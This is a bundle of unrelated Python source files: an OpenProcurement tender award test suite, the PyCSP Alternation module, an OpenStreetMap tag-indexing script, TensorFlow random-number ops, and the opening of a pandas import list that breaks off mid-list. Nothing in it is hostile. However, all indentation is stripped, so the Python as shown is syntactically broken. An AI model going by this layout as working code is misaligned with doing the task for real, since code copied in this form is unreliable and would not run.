response = self.app.post_json('/tenders/{}/awards'.format(self.tender_id),
{'data': {'suppliers': [author],
'status': 'pending',
'bid_id': self.bids[0]['id']}})
award = response.json['data']
self.award_id = award['id']
self.app.authorization = auth
class TenderStage2UA2LotAwardDocumentResourceTest(BaseCompetitiveDialogUAStage2ContentWebTest,
Tender2LotAwardDocumentResourceTestMixin):
initial_status = 'active.qualification'
initial_bids = test_tender_bids
initial_lots = deepcopy(2 * test_lots)
def setUp(self):
super(TenderStage2UA2LotAwardDocumentResourceTest, self).setUp()
# Create award
bid = self.bids[0]
auth = self.app.authorization
self.app.authorization = ('Basic', ('token', ''))
response = self.app.post_json('/tenders/{}/awards'.format(
self.tender_id), {'data': {'suppliers': [author], 'status': 'pending',
'bid_id': bid['id'], 'lotID': bid['lotValues'][0]['relatedLot']}})
award = response.json['data']
self.award_id = award['id']
self.app.authorization = auth
def suite():
suite = unittest.TestSuite()
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardComplaintDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardComplaintResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EU2LotAwardResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardComplaintDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardComplaintResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardDocumentResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EUAwardResourceTest))
suite.addTest(unittest.makeSuite(TenderStage2EULotAwardResourceTest))
return suite
if __name__ == '__main__':
unittest.main(defaultTest='suite')
|
|
"""
Alternation module
Copyright (c) 2009 John Markus Bjoerndalen <[email protected]>,
Brian Vinter <[email protected]>, Rune M. Friborg <[email protected]>.
See LICENSE.txt for licensing details (MIT License).
"""
# Imports
import inspect
import types
import collections
import pickle
from pycsp.parallel.guard import Guard
from pycsp.parallel.exceptions import *
from pycsp.parallel.const import *
# Decorators
def choice(func):
"""
@choice decorator for making a function into a Choice factory.
Each generated Choice object can be used as actions in one of
the four guards: InputGuard, OutputGuard, SkipGuard or TimeoutGuard.
The keyword variable channel_input is special and is provided in the
execution of the choice. Choice functions must accept the channel_input
parameter, when used in InputGuards.
Usage:
>>> @choice
... def add_service(serviceDB, channel_input):
... (id, request) = channel_input
... if serviceDB.has_key(id):
... serviceDB[id].append(request)
... else:
... serviceDB[id] = [request]
>>> @choice
... def quit(ch_end):
... poison(ch_end)
>>> _,_ = AltSelect(
InputGuard(request, action=add_service(services)),
TimeoutGuard(action=quit(request)))
The Choice factory returned by the @choice decorator:
func(*args, **kwargs)
"""
# __choice_fn func_name used to identify function in Alternation.execute
def __choice_fn(*args, **kwargs):
return Choice(func, *args, **kwargs)
return __choice_fn
# Classes
class Choice(object):
""" Choice(func, *args, **kwargs)
It is recommended to use the @choice decorator, to create Choice instances
"""
def __init__(self, fn, *args, **kwargs):
self.fn = fn
self.args = args
self.kwargs = kwargs
def invoke_on_input(self, channel_input):
self.kwargs['channel_input'] = channel_input
self.fn(*self.args, **self.kwargs)
del self.kwargs['channel_input']
def invoke_on_output(self):
self.fn(*self.args, **self.kwargs)
class Alternation(object):
""" Alternation([{cin0:None, (cout0,val):None}])
Alternation provides the basic interface to Alt. It is recommended
to use AltSelect / FairSelect as these are much more user-friendly.
Alternation supports the SkipGuard, TimeoutGuard, ChannelEndRead
or ChannelEndWrite objects.
Alternation guarantees priority if the flag ensurePriority = True
Note that alternation always performs the guard that was chosen,
i.e. channel input or output is executed within the alternation so
even the empty choice with an alternation execution or a choice where
the results are simply ignored, still performs the guarded input or
output.
Usage:
>>> L = []
>>> @choice
... def action(channel_input):
... L.append(channel_input)
>>> @process
... def P1(cout, n=5):
... for i in range(n):
... cout(i)
>>> @process
... def P2(cin1, cin2, n=10):
... alt = Alternation([{cin1:action(), cin2:action()}])
... for i in range(n):
... alt.execute()
>>> C1, C2 = Channel(), Channel()
>>> Parallel(P1(C1.writer()), P1(C2.writer()), P2(C1.reader(), C2.reader()))
>>> len(L)
10
>>> L.sort()
>>> L
[0, 0, 1, 1, 2, 2, 3, 3, 4, 4]
Performing a non-blocking write
>>> Alternation([
... { ( cout , datablock ): None } , # Try to write to a channel
... { SkipGuard (): " print('skipped !') } # Skip the alternation
... ]).execute()
Input with a timeout
>>> g, msg = Alternation([
... { cin : None } ,
... { TimeoutGuard (seconds=1): " print('Ignore this message !') }
... ]).select()
>>> if g == cin:
... print("Got: %s" % (msg))
"""
def __init__(self, guards, ensurePriority=False):
self.enableAcks = ensurePriority
# Preserve tuple entries and convert dictionary entries to tuple entries
self.guards = []
for g in guards:
if type(g) == tuple:
self.guards.append(g)
elif type(g) == dict:
for elem in list(g.keys()):
if type(elem) == tuple:
self.guards.append((elem[0], elem[1], g[elem]))
else:
self.guards.append((elem, g[elem]))
# The internal representation of guards is a prioritized list
# of tuples:
# input guard: (channel end, action)
# output guard: (channel end, msg, action)
# Default is to go one up in stackframe.
self.execute_frame = -1
def _set_execute_frame(self, steps):
if steps > 0:
self.execute_frame = -1*steps
else:
self.execute_frame = steps
def __result(self, reqs):
act=None
poison=False
retire=False
p, _ = getThreadAndName()
if p.state==SUCCESS:
for c in list(reqs.keys()):
if isinstance(c, Guard):
if c.id == p.result_ch:
act = c
c._close()
elif c.channel.name == p.result_ch:
act = c
elif p.state==POISON:
poison=True
elif p.state==RETIRE:
retire=True
return (act, poison, retire)
def _choose(self):
reqs={}
act = None
poison = False
retire = False
p, _ = getThreadAndName()
p.state = READY
p.sequence_number += 1
try:
idx = 0
for prio_item in self.guards:
if len(prio_item) == 3:
c, msg, action = prio_item
c._post_write(p, msg, ack=self.enableAcks)
op=WRITE
else:
c, action = prio_item
c._post_read(p, ack=self.enableAcks)
op=READ
reqs[c]=(idx, op)
if self.enableAcks:
p.wait_ack()
if p.state != READY:
# state has been changed by process lockthread, thus we can abort and read p.state.
break
idx += 1
except ChannelPoisonException:
act, poison, retire = self.__result(reqs)
if not act:
raise ChannelPoisonException
except ChannelRetireException:
act, poison, retire = self.__result(reqs)
if not act:
raise ChannelRetireException
# If noone have offered a channelrequest, we wait.
if p.state == READY:
p.wait()
if not act:
act, poison, retire = self.__result(reqs)
if not act:
if poison:
raise ChannelPoisonException()
if retire:
raise ChannelRetireException()
print('We should not get here in choice!!!')
idx, op = reqs[act]
# unpickle msg if necessary
msg = p.result_msg
if msg == None:
# Got successful write
pass
else:
# Got successful read
if type(msg) == list:
msg = msg[0]
else:
if msg == b"":
msg = None
else:
msg = pickle.loads(msg)[0]
return (idx, act, msg, op)
def execute(self):
"""
Selects the guard and executes the attached action. Action is a function or python code passed in a string.
>>> L1,L2 = [],[]
>>> @process
... def P1(cout, n):
... for i in range(n):
... cout(i)
>>> @process
... def P2(cin1, cin2, n):
... alt = Alternation([{
... cin1:"L1.append(channel_input)",
... cin2:"L2.append(channel_input)"
... }])
... for i in range(n):
... alt.execute()
>>> C1, C2 = Channel(), Channel()
>>> Parallel(P1(C1.writer(),n=10), P1(C2.writer(),n=5), P2(C1.reader(), C2.reader(), n=15))
>>> len(L1), len(L2)
(10, 5)
"""
idx, c, result_msg, op = self._choose()
if self.guards[idx]:
action = self.guards[idx][-1]
# Executing Choice object method
if isinstance(action, Choice):
if op==WRITE:
action.invoke_on_output()
else:
action.invoke_on_input(result_msg)
# Executing callback function object
elif isinstance(action, collections.Callable):
# Choice function not allowed as callback
if type(action) == types.FunctionType and action.__name__ == '__choice_fn':
raise InfoException('@choice function is not instantiated. Please use action() and not just action')
else:
# Execute callback function
if op==WRITE:
action()
else:
action(channel_input=result_msg)
# Compiling and executing string
elif type(action) == str:
# Fetch process frame and namespace
processframe= inspect.currentframe()
steps = self.execute_frame
while (steps < 0):
processframe = processframe.f_back
steps += 1
# Compile source provided in a string.
code = compile(action,processframe.f_code.co_filename + ' line ' + str(processframe.f_lineno) + ' in string' ,'exec')
f_globals = processframe.f_globals
f_locals = processframe.f_locals
if op==READ:
f_locals.update({'channel_input':result_msg})
# Execute action
exec(code, f_globals, f_locals)
elif type(action) == type(None):
pass
else:
raise Exception('Failed executing action: '+str(action))
return (c, result_msg)
def select(self):
"""
Selects the guard.
>>> L1,L2 = [],[]
>>> @process
... def P1(cout, n=5):
... for i in range(n):
... cout(i)
>>> @process
... def P2(cin1, cin2, n=10):
... alt = Alternation([{
... cin1:None,
... cin2:None
... }])
... for i in range(n):
... (g, msg) = alt.select()
... if g == cin1:
... L1.append(msg)
... if g == cin2:
... L2.append(msg)
>>> C1, C2 = Channel(), Channel()
>>> Parallel(P1(C1.writer()), P1(C2.writer()), P2(C1.reader(), C2.reader()))
>>> len(L1), len(L2)
(5, 5)
"""
idx, c, result_msg, op = self._choose()
return (c, result_msg)
|
|
import bz2, sys, os, time
import xmlprocessing
from pycontainers import compressedfile, hashtable
#UK dump size nodes=33017987 ways=4040979 relations=80851
def StoreFactoryCreate(fina, maskBits = 26, maxCachedPages = 50):
try:
os.unlink(fina)
except:
pass
compfile = compressedfile.CompressedFile(fina, createFile=True)
compfile.maxCachePages = maxCachedPages
table = hashtable.HashTableFile(compfile, maskBits, 1, 1, 1, 10000, createFile=True)
return table, compfile
def StoreFactoryRead(fina, maxCachedPages = 50):
compfile = compressedfile.CompressedFile(fina, createFile=False)
compfile.maxCachePages = maxCachedPages
table = hashtable.HashTableFile(compfile, None, 0, 1, 1, 10000, createFile=False)
return table, compfile
class TagIndex(object):
def __init__(self, outFina, createFile = True):
self.nodes = 0
self.ways = 0
self.relations = 0
self.objs = 0
self.lastDisplayTime = time.time()
self.lastDisplayCount = 0
self.outFina = outFina
self.objNumStart = None
self.objNumStartPos = 0
self.objNumEnd = None
if createFile:
print "Create node tables"
self.nodeStartTable, self.nodeStartFile = StoreFactoryCreate(self.outFina+"nodestart.hash", 32, 500)
self.nodeEndTable, self.nodeEndFile = StoreFactoryCreate(self.outFina+"nodeend.hash", 32, 500)
print "Create way tables"
self.wayStartTable, self.wayStartFile = StoreFactoryCreate(self.outFina+"waystart.hash", 28, 50)
self.wayEndTable, self.wayEndFile = StoreFactoryCreate(self.outFina+"wayend.hash", 28, 50)
print "Create relation tables"
self.relationStartTable, self.relationStartFile = StoreFactoryCreate(self.outFina+"relationstart.hash", 22, 50)
self.relationEndTable, self.relationEndFile = StoreFactoryCreate(self.outFina+"relationend.hash", 22, 50)
else:
print "Open node tables"
self.nodeStartTable, self.nodeStartFile = StoreFactoryRead(self.outFina+"nodestart.hash", 500)
self.nodeEndTable, self.nodeEndFile = StoreFactoryRead(self.outFina+"nodeend.hash", 500)
print "Open way tables"
self.wayStartTable, self.wayStartFile = StoreFactoryRead(self.outFina+"waystart.hash", 50)
self.wayEndTable, self.wayEndFile = StoreFactoryRead(self.outFina+"wayend.hash", 50)
print "Open relation tables"
self.relationStartTable, self.relationStartFile = StoreFactoryRead(self.outFina+"relationstart.hash", 50)
self.relationEndTable, self.relationEndFile = StoreFactoryRead(self.outFina+"relationend.hash", 50)
self.nodeStartTable.verbose = 0
self.nodeEndTable.verbose = 0
if 0:
print "Clear node hashes"
self.nodeStartTable.clear()
self.nodeEndTable.clear()
print "Clear way hashes"
self.wayStartTable.clear()
self.wayEndTable.clear()
print "Clear relation hashes"
self.relationStartTable.clear()
self.relationEndTable.clear()
#self.nodeStartTable.allocate_mask_size(21)
#self.nodeEndTable.allocate_mask_size(21)
def __del__(self):
print "Flushing"
del self.nodeStartTable
del self.nodeEndTable
del self.wayStartTable
del self.wayEndTable
del self.relationStartTable
del self.relationEndTable
def CurrentPosFunc(self, currentPos):
pass
def TagLimitCallback(self, name, depth, attr, start, end):
if depth != 2:
return
if time.time() - self.lastDisplayTime > 1.:
rate = (self.objs - self.lastDisplayCount) / (time.time() - self.lastDisplayTime)
self.lastDisplayCount = self.objs
self.lastDisplayTime = time.time()
print self.nodes, self.ways, self.relations, self.objs, "("+str(rate)+" obj per sec)"
if 1:
print "page reads", self.nodeStartFile.cacheReads, self.nodeStartFile.diskReads
print "page writes", self.nodeStartFile.cacheWrites, self.nodeStartFile.diskWrites
doInsert = self.CurrentObjectWantedCheck()
if doInsert and name == "node":
objId = int(attr['id'])
objVersion = int(attr['version'])
if objId in self.nodeStartTable:
tmpStart = self.nodeStartTable[objId]
else:
tmpStart = {}
if objId in self.nodeEndTable:
tmpEnd = self.nodeEndTable[objId]
else:
tmpEnd = {}
tmpStart[objVersion] = start
tmpEnd[objVersion] = end
self.nodeStartTable[objId] = tmpStart
self.nodeEndTable[objId] = tmpEnd
if doInsert and name == "way":
objId = int(attr['id'])
objVersion = int(attr['version'])
if objId in self.wayStartTable:
tmpStart = self.wayStartTable[objId]
else:
tmpStart = {}
if objId in self.wayEndTable:
tmpEnd = self.wayEndTable[objId]
else:
tmpEnd = {}
tmpStart[objVersion] = start
tmpEnd[objVersion] = end
self.wayStartTable[objId] = tmpStart
self.wayEndTable[objId] = tmpEnd
if doInsert and name == "relation":
objId = int(attr['id'])
objVersion = int(attr['version'])
if objId in self.relationStartTable:
tmpStart = self.relationStartTable[objId]
else:
tmpStart = {}
if objId in self.relationEndTable:
tmpEnd = self.relationEndTable[objId]
else:
tmpEnd = {}
tmpStart[objVersion] = start
tmpEnd[objVersion] = end
self.relationStartTable[objId] = tmpStart
self.relationEndTable[objId] = tmpEnd
if name == "node":
self.nodes += 1
if name == "way":
self.ways += 1
if name == "relation":
self.relations += 1
self.objs += 1
def CurrentObjectWantedCheck(self):
doInsert = True
if self.objNumStart is not None and self.objNumStart > self.objs:
doInsert = False
if self.objNumEnd is not None and self.objNumEnd < self.objs:
doInsert = False
return doInsert
def flush(self):
self.nodeStartTable.flush()
self.nodeEndTable.flush()
self.wayStartTable.flush()
self.wayEndTable.flush()
self.relationStartTable.flush()
self.relationEndTable.flush()
if __name__ == "__main__":
if len(sys.argv) < 2:
print "Specify input file as argument"
exit(1)
if len(sys.argv) < 3:
print "Specify output file as argument"
exit(1)
infi = bz2.BZ2File(sys.argv[1])
try:
os.unlink(sys.argv[2])
except:
pass
outfi = compressedfile.CompressedFile(sys.argv[2]+"/data", createFile = True)
tagIndex = TagIndex(sys.argv[2]+"/")
parser = xmlprocessing.RewriteXml(outfi, tagIndex.TagLimitCallback, tagIndex.CurrentObjectWantedCheck, tagIndex.CurrentPosFunc)
parser.ParseFile(infi)
#print len(tagIndex.nodeStartTable)
#print tagIndex.nodeStartTable.binsInUse
#print tagIndex.nodeStartTable.hashMask
print tagIndex.nodes, tagIndex.ways, tagIndex.relations, tagIndex.objs
del tagIndex
del parser
print "All done"
|
|
# Copyright 2015 The TensorFlow Authors. All Rights Reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
# ==============================================================================
"""Operations for generating random numbers."""
from __future__ import absolute_import
from __future__ import division
from __future__ import print_function
import numpy as np
from tensorflow.python.framework import dtypes
from tensorflow.python.framework import ops
from tensorflow.python.framework import random_seed
from tensorflow.python.ops import array_ops
from tensorflow.python.ops import control_flow_ops
from tensorflow.python.ops import gen_random_ops
from tensorflow.python.ops import math_ops
# go/tf-wildcard-import
# pylint: disable=wildcard-import
from tensorflow.python.ops.gen_random_ops import *
from tensorflow.python.util import deprecation
from tensorflow.python.util.tf_export import tf_export
# pylint: enable=wildcard-import
def _ShapeTensor(shape):
"""Convert to an int32 or int64 tensor, defaulting to int32 if empty."""
if isinstance(shape, (tuple, list)) and not shape:
dtype = dtypes.int32
else:
dtype = None
return ops.convert_to_tensor(shape, dtype=dtype, name="shape")
@tf_export("random.normal", "random_normal")
def random_normal(shape,
mean=0.0,
stddev=1.0,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a normal distribution.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the normal
distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard deviation
of the normal distribution.
dtype: The type of the output.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random normal values.
"""
with ops.name_scope(name, "random_normal", [shape, mean, stddev]) as name:
shape_tensor = _ShapeTensor(shape)
mean_tensor = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev_tensor = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
seed1, seed2 = random_seed.get_seed(seed)
rnd = gen_random_ops.random_standard_normal(
shape_tensor, dtype, seed=seed1, seed2=seed2)
mul = rnd * stddev_tensor
value = math_ops.add(mul, mean_tensor, name=name)
return value
ops.NotDifferentiable("RandomStandardNormal")
def parameterized_truncated_normal(shape,
means=0.0,
stddevs=1.0,
minvals=-2.0,
maxvals=2.0,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a truncated normal distribution.
The generated values follow a normal distribution with specified mean and
standard deviation, except that values whose magnitude is more than 2 standard
deviations from the mean are dropped and re-picked.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
means: A 0-D Tensor or Python value of type `dtype`. The mean of the
truncated normal distribution.
stddevs: A 0-D Tensor or Python value of type `dtype`. The standard
deviation of the truncated normal distribution.
minvals: A 0-D Tensor or Python value of type `dtype`. The minimum value of
the truncated normal distribution.
maxvals: A 0-D Tensor or Python value of type `dtype`. The maximum value of
the truncated normal distribution.
dtype: The type of the output.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random truncated normal values.
"""
with ops.name_scope(name, "parameterized_truncated_normal",
[shape, means, stddevs, minvals, maxvals]) as name:
shape_tensor = _ShapeTensor(shape)
means_tensor = ops.convert_to_tensor(means, dtype=dtype, name="means")
stddevs_tensor = ops.convert_to_tensor(stddevs, dtype=dtype, name="stddevs")
minvals_tensor = ops.convert_to_tensor(minvals, dtype=dtype, name="minvals")
maxvals_tensor = ops.convert_to_tensor(maxvals, dtype=dtype, name="maxvals")
seed1, seed2 = random_seed.get_seed(seed)
rnd = gen_random_ops.parameterized_truncated_normal(
shape_tensor,
means_tensor,
stddevs_tensor,
minvals_tensor,
maxvals_tensor,
seed=seed1,
seed2=seed2)
return rnd
@tf_export("random.truncated_normal", "truncated_normal")
def truncated_normal(shape,
mean=0.0,
stddev=1.0,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a truncated normal distribution.
The generated values follow a normal distribution with specified mean and
standard deviation, except that values whose magnitude is more than 2 standard
deviations from the mean are dropped and re-picked.
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
mean: A 0-D Tensor or Python value of type `dtype`. The mean of the
truncated normal distribution.
stddev: A 0-D Tensor or Python value of type `dtype`. The standard deviation
of the normal distribution, before truncation.
dtype: The type of the output.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random truncated normal values.
"""
with ops.name_scope(name, "truncated_normal", [shape, mean, stddev]) as name:
shape_tensor = _ShapeTensor(shape)
mean_tensor = ops.convert_to_tensor(mean, dtype=dtype, name="mean")
stddev_tensor = ops.convert_to_tensor(stddev, dtype=dtype, name="stddev")
seed1, seed2 = random_seed.get_seed(seed)
rnd = gen_random_ops.truncated_normal(
shape_tensor, dtype, seed=seed1, seed2=seed2)
mul = rnd * stddev_tensor
value = math_ops.add(mul, mean_tensor, name=name)
return value
ops.NotDifferentiable("ParameterizedTruncatedNormal")
ops.NotDifferentiable("TruncatedNormal")
@tf_export("random.uniform", "random_uniform")
def random_uniform(shape,
minval=0,
maxval=None,
dtype=dtypes.float32,
seed=None,
name=None):
"""Outputs random values from a uniform distribution.
The generated values follow a uniform distribution in the range
`[minval, maxval)`. The lower bound `minval` is included in the range, while
the upper bound `maxval` is excluded.
For floats, the default range is `[0, 1)`. For ints, at least `maxval` must
be specified explicitly.
In the integer case, the random integers are slightly biased unless
`maxval - minval` is an exact power of two. The bias is small for values of
`maxval - minval` significantly smaller than the range of the output (either
`2**32` or `2**64`).
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output tensor.
minval: A 0-D Tensor or Python value of type `dtype`. The lower bound on the
range of random values to generate. Defaults to 0.
maxval: A 0-D Tensor or Python value of type `dtype`. The upper bound on
the range of random values to generate. Defaults to 1 if `dtype` is
floating point.
dtype: The type of the output: `float16`, `float32`, `float64`, `int32`,
or `int64`.
seed: A Python integer. Used to create a random seed for the distribution.
See `tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of the specified shape filled with random uniform values.
Raises:
ValueError: If `dtype` is integral and `maxval` is not specified.
"""
dtype = dtypes.as_dtype(dtype)
if dtype not in (dtypes.float16, dtypes.bfloat16, dtypes.float32,
dtypes.float64, dtypes.int32, dtypes.int64):
raise ValueError("Invalid dtype %r" % dtype)
if maxval is None:
if dtype.is_integer:
raise ValueError("Must specify maxval for integer dtype %r" % dtype)
maxval = 1
with ops.name_scope(name, "random_uniform", [shape, minval, maxval]) as name:
shape = _ShapeTensor(shape)
minval = ops.convert_to_tensor(minval, dtype=dtype, name="min")
maxval = ops.convert_to_tensor(maxval, dtype=dtype, name="max")
seed1, seed2 = random_seed.get_seed(seed)
if dtype.is_integer:
return gen_random_ops.random_uniform_int(
shape, minval, maxval, seed=seed1, seed2=seed2, name=name)
else:
rnd = gen_random_ops.random_uniform(shape, dtype, seed=seed1, seed2=seed2)
return math_ops.add(rnd * (maxval - minval), minval, name=name)
ops.NotDifferentiable("RandomUniform")
@tf_export("random.shuffle", "random_shuffle")
def random_shuffle(value, seed=None, name=None):
"""Randomly shuffles a tensor along its first dimension.
The tensor is shuffled along dimension 0, such that each `value[j]` is mapped
to one and only one `output[i]`. For example, a mapping that might occur for a
3x2 tensor is:
```python
[[1, 2], [[5, 6],
[3, 4], ==> [1, 2],
[5, 6]] [3, 4]]
```
Args:
value: A Tensor to be shuffled.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: A name for the operation (optional).
Returns:
A tensor of same shape and type as `value`, shuffled along its first
dimension.
"""
seed1, seed2 = random_seed.get_seed(seed)
return gen_random_ops.random_shuffle(
value, seed=seed1, seed2=seed2, name=name)
@tf_export("image.random_crop", "random_crop")
def random_crop(value, size, seed=None, name=None):
"""Randomly crops a tensor to a given size.
Slices a shape `size` portion out of `value` at a uniformly chosen offset.
Requires `value.shape >= size`.
If a dimension should not be cropped, pass the full size of that dimension.
For example, RGB images can be cropped with
`size = [crop_height, crop_width, 3]`.
Args:
value: Input tensor to crop.
size: 1-D tensor with size the rank of `value`.
seed: Python integer. Used to create a random seed. See
`tf.set_random_seed`
for behavior.
name: A name for this operation (optional).
Returns:
A cropped tensor of the same rank as `value` and shape `size`.
"""
# TODO(shlens): Implement edge case to guarantee output size dimensions.
# If size > value.shape, zero pad the result so that it always has shape
# exactly size.
with ops.name_scope(name, "random_crop", [value, size]) as name:
value = ops.convert_to_tensor(value, name="value")
size = ops.convert_to_tensor(size, dtype=dtypes.int32, name="size")
shape = array_ops.shape(value)
check = control_flow_ops.Assert(
math_ops.reduce_all(shape >= size),
["Need value.shape >= size, got ", shape, size],
summarize=1000)
shape = control_flow_ops.with_dependencies([check], shape)
limit = shape - size + 1
offset = random_uniform(
array_ops.shape(shape),
dtype=size.dtype,
maxval=size.dtype.max,
seed=seed) % limit
return array_ops.slice(value, offset, size, name=name)
@tf_export("random.multinomial", "multinomial")
def multinomial(logits, num_samples, seed=None, name=None, output_dtype=None):
"""Draws samples from a multinomial distribution.
Example:
```python
# samples has shape [1, 5], where each value is either 0 or 1 with equal
# probability.
samples = tf.multinomial(tf.log([[10., 10.]]), 5)
```
Args:
logits: 2-D Tensor with shape `[batch_size, num_classes]`. Each slice
`[i, :]` represents the unnormalized log-probabilities for all classes.
num_samples: 0-D. Number of independent samples to draw for each row slice.
seed: A Python integer. Used to create a random seed for the distribution.
See
`tf.set_random_seed`
for behavior.
name: Optional name for the operation.
output_dtype: integer type to use for the output. Defaults to int64.
Returns:
The drawn samples of shape `[batch_size, num_samples]`.
"""
with ops.name_scope(name, "multinomial", [logits]):
logits = ops.convert_to_tensor(logits, name="logits")
seed1, seed2 = random_seed.get_seed(seed)
return gen_random_ops.multinomial(
logits, num_samples, seed=seed1, seed2=seed2, output_dtype=output_dtype)
ops.NotDifferentiable("Multinomial")
@tf_export("random.gamma", "random_gamma")
@deprecation.deprecated_endpoints("random_gamma")
def random_gamma(shape,
alpha,
beta=None,
dtype=dtypes.float32,
seed=None,
name=None):
"""Draws `shape` samples from each of the given Gamma distribution(s).
`alpha` is the shape parameter describing the distribution(s), and `beta` is
the inverse scale parameter(s).
Note: Because internal calculations are done using `float64` and casting has
`floor` semantics, we must manually map zero outcomes to the smallest
possible positive floating-point value, i.e., `np.finfo(dtype).tiny`. This
means that `np.finfo(dtype).tiny` occurs more frequently than it otherwise
should. This bias can only happen for small values of `alpha`, i.e.,
`alpha << 1` or large values of `beta`, i.e., `beta >> 1`.
The samples are differentiable w.r.t. alpha and beta.
The derivatives are computed using the approach described in the paper
[Michael Figurnov, Shakir Mohamed, Andriy Mnih.
Implicit Reparameterization Gradients, 2018](https://arxiv.org/abs/1805.08498)
Example:
```python
samples = tf.random_gamma([10], [0.5, 1.5])
# samples has shape [10, 2], where each slice [:, 0] and [:, 1] represents
# the samples drawn from each distribution
samples = tf.random_gamma([7, 5], [0.5, 1.5])
# samples has shape [7, 5, 2], where each slice [:, :, 0] and [:, :, 1]
# represents the 7x5 samples drawn from each of the two distributions
alpha = tf.constant([[1.],[3.],[5.]])
beta = tf.constant([[3., 4.]])
samples = tf.random_gamma([30], alpha=alpha, beta=beta)
# samples has shape [30, 3, 2], with 30 samples each of 3x2 distributions.
loss = tf.reduce_mean(tf.square(samples))
dloss_dalpha, dloss_dbeta = tf.gradients(loss, [alpha, beta])
# unbiased stochastic derivatives of the loss function
alpha.shape == dloss_dalpha.shape # True
beta.shape == dloss_dbeta.shape # True
```
Args:
shape: A 1-D integer Tensor or Python array. The shape of the output samples
to be drawn per alpha/beta-parameterized distribution.
alpha: A Tensor or Python value or N-D array of type `dtype`. `alpha`
provides the shape parameter(s) describing the gamma distribution(s) to
sample. Must be broadcastable with `beta`.
beta: A Tensor or Python value or N-D array of type `dtype`. Defaults to 1.
`beta` provides the inverse scale parameter(s) of the gamma
distribution(s) to sample. Must be broadcastable with `alpha`.
dtype: The type of alpha, beta, and the output: `float16`, `float32`, or
`float64`.
seed: A Python integer. Used to create a random seed for the distributions.
See
`tf.set_random_seed`
for behavior.
name: Optional name for the operation.
Returns:
samples: a `Tensor` of shape
`tf.concat([shape, tf.shape(alpha + beta)], axis=0)` with values of type
`dtype`.
"""
with ops.name_scope(name, "random_gamma", [shape, alpha, beta]):
shape = ops.convert_to_tensor(shape, name="shape", dtype=dtypes.int32)
alpha = ops.convert_to_tensor(alpha, name="alpha", dtype=dtype)
beta = ops.convert_to_tensor(
beta if beta is not None else 1, name="beta", dtype=dtype)
alpha_broadcast = alpha + array_ops.zeros_like(beta)
seed1, seed2 = random_seed.get_seed(seed)
return math_ops.maximum(
np.finfo(dtype.as_numpy_dtype).tiny,
gen_random_ops.random_gamma(
shape, alpha_broadcast, seed=seed1, seed2=seed2) / beta)
@tf_export("random.poisson", "random_poisson")
@deprecation.deprecated_endpoints("random_poisson")
def random_poisson(lam, shape, dtype=dtypes.float32, seed=None, name=None):
"""Draws `shape` samples from each of the given Poisson distribution(s).
`lam` is the rate parameter describing the distribution(s).
Example:
```python
samples = tf.random_poisson([0.5, 1.5], [10])
# samples has shape [10, 2], where each slice [:, 0] and [:, 1] represents
# the samples drawn from each distribution
samples = tf.random_poisson([12.2, 3.3], [7, 5])
# samples has shape [7, 5, 2], where each slice [:, :, 0] and [:, :, 1]
# represents the 7x5 samples drawn from each of the two distributions
```
Args:
lam: A Tensor or Python value or N-D array of type `dtype`.
`lam` provides the rate parameter(s) describing the poisson
distribution(s) to sample.
shape: A 1-D integer Tensor or Python array. The shape of the output samples
to be drawn per "rate"-parameterized distribution.
dtype: The type of the output: `float16`, `float32`, `float64`, `int32` or
`int64`.
seed: A Python integer. Used to create a random seed for the distributions.
See
`tf.set_random_seed`
for behavior.
name: Optional name for the operation.
Returns:
samples: a `Tensor` of shape `tf.concat([shape, tf.shape(lam)], axis=0)`
with values of type `dtype`.
"""
with ops.name_scope(name, "random_poisson", [lam, shape]):
shape = ops.convert_to_tensor(shape, name="shape", dtype=dtypes.int32)
seed1, seed2 = random_seed.get_seed(seed)
return gen_random_ops.random_poisson_v2(
shape, lam, dtype=dtype, seed=seed1, seed2=seed2)
|
|
import sys
import itertools
import functools
import numpy as np
try:
import bottleneck as bn
_USE_BOTTLENECK = True
except ImportError: # pragma: no cover
_USE_BOTTLENECK = False
import pandas.core.common as com
import pandas.hashtable as _hash
from pandas import compat, lib, algos, tslib
from pandas.compat import builtins
from pandas.core.common import (isnull, notnull, _values_from_object,
_maybe_upcast_putmask,
ensure_float, _ensure_float64,
_ensure_int64, _ensure_object,
is_float, is_integer, is_complex,
is_float_dtype, _is_floating_dtype,
is_complex_dtype, is_integer_dtype,
is_bool_dtype, is_object_dtype,
is_datetime64_dtype, is_timedelta64_dtype,
_is_datetime_or_timedelta_dtype,
